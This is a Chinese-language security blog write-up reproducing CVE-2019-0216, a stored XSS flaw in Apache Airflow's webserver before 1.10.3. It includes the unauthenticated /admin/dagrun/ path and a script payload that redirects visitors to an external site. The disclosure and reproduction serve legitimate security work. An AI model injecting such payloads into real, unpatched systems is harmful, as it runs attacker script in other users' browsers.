(CVE-2019-0216)Apache Airflow 储存型xss

admin 2020年8月9日21:48:41评论504 views字数 573阅读1分54秒阅读模式
(CVE-2019-0216)Apache Airflow 储存型xss

零组安全团队


点击蓝字



关注我们

    标题:(CVE-2019-0216)Apache Airflow 储存型xss   

    出自:零组攻防实验室

    文库是否收录:是

    本文字数:327

    阅读时常:8 min

01





漏洞简介



 Apache Airflow 1.10.2及之前版本中的airflow webserver服务存在跨站脚本漏洞,该漏洞源于WEB应用缺少对客户端数据的正确验证。攻击者可利用该漏洞执行客户端代码。 



02





漏洞影响



Apache Airflow < 1.10.3

03





复现过程





访问/admin/dagrun/(默认是不需要密码)

创建一个项目

(CVE-2019-0216)Apache Airflow 储存型xss

返回列表,可以看到点击“运行”可以让你输入HTML代码

(CVE-2019-0216)Apache Airflow 储存型xss

可以在里面输入代码

<script>_a="https://b4ny4n.github.io"</script>


<script>document.location=_a</script> 


(CVE-2019-0216)Apache Airflow 储存型xss

可直接造成储存型xss

(CVE-2019-0216)Apache Airflow 储存型xss

EDN








(CVE-2019-0216)Apache Airflow 储存型xss

“以上文章已收录零组资料文库”


PS:想要获取一手零组官方最新资讯,关注公众号回复加群二字获取二维码扫码加群与各位表哥表姐和强大的福林表哥一起交流讨论研究吧~


分享、点赞和再看,能不能让我至少拥有一个呀?妖妖在这里祝各位表哥技术节节高升呀。





零组安全团队

(CVE-2019-0216)Apache Airflow 储存型xss

扫二维码|关注我们


微信号|Zerosecurityxyao

微信公众号|零组攻防实验室






  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2020年8月9日21:48:41
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   (CVE-2019-0216)Apache Airflow 储存型xsshttp://cn-sec.com/archives/84507.html

发表评论

匿名网友 填写信息